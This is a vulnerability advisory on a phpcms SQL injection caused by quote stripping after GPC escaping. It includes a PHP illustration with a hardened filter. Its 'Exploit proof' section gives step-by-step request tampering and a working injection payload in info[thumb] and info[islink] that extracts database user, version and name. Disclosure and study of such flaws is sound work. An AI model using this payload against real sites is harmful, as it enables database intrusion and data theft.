phpcms latest version SQL injection - vulnerability warning - myhack58

ID MYHACK58:62201456336
Type myhack58
Reporter Anonymous
Modified 2014-11-28T00:00:00


Brief description:

phpcms SQL injection(the latest version tested)

Detailed description:

Vulnerability file

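function image($field, $value) {
    // Strips quotes and parentheses, but keeps any backslash that GPC escaping put in front of a quote
    $value = remove_xss(str_replace(array("'", '"', '(', ')'), '', $value));
    return trim($value);
}
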
The filter strips quote characters, but because of GPC escaping each quote arrives as \', so stripping the quote leaves the \ behind, resulting in injection.
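The effect described above, as an added example (not phpcms code and not part of the original advisory). The helper names, the concatenating `set_clause()` builder and the hardened filter are hypothetical, and the hardened variant assumes a thumb value is a plain http/https URL.

```php
<?php
// Added illustration, not phpcms code. remove_xss() is left out because the
// flaw sits in the quote stripping itself.

// Filtering as in image() on the page.
function image_filter_vulnerable(string $value): string {
    return trim(str_replace(array("'", '"', '(', ')'), '', $value));
}

// Hardened variant (assumption: thumb is a plain http/https URL). Undo the
// GPC escaping first, then allow-list; anything else is rejected.
function image_filter_hardened(string $value): string {
    $raw = trim(stripslashes($value));
    $ok  = preg_match('#^https?://[^\s\'"\\\\()<>]+$#iD', $raw) === 1;
    return $ok ? $raw : '';
}

// True when the value ends in an odd number of backslashes, i.e. the last
// one would escape the quote that closes a SQL string literal.
function ends_with_dangling_backslash(string $value): bool {
    preg_match('/\\\\*\z/', $value, $m);
    return strlen($m[0]) % 2 === 1;
}

// Hypothetical concatenating query builder, to show where the value lands.
function set_clause(array $fields): string {
    $parts = array();
    foreach ($fields as $name => $value) {
        $parts[] = "`$name`='$value'";
    }
    return implode(',', $parts);
}

// Constructed input: what the filter receives after GPC-style escaping.
$escaped = addslashes("http://site'");             // http://site\'

foreach (array('vulnerable', 'hardened') as $mode) {
    $thumb = call_user_func("image_filter_$mode", $escaped);
    printf("%-10s thumb=[%s] dangling=%s\n  SET %s\n", $mode, $thumb,
        var_export(ends_with_dangling_backslash($thumb), true),
        set_clause(array('thumb' => $thumb, 'islink' => '0')));
}
```

In the vulnerable run the thumb literal ends in `\'`, so its closing quote is escaped and the literal runs on into the next field. Binding values as query parameters instead of concatenating them removes the dependency on escaping altogether.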

Exploit proof:

Article submission must be enabled.

  1. First, submit any article, save it, then edit it, as shown in the figure:

[Figure: 1.jpg]

  2. On the edit page, click Save directly, capture the request, and modify it as follows:

[Figure: 2.jpg]

Set info[thumb] to: http://site'

Set info[islink] to:

,description=(select concat(user(),0x7c,version(),0x7c,database())) -- s

Finally, confirm.

Enter the edit page again to see the injection result, as shown in the figure:

[Figure: 3.jpg]

Vulnerability proof:

[Figure: 3.jpg]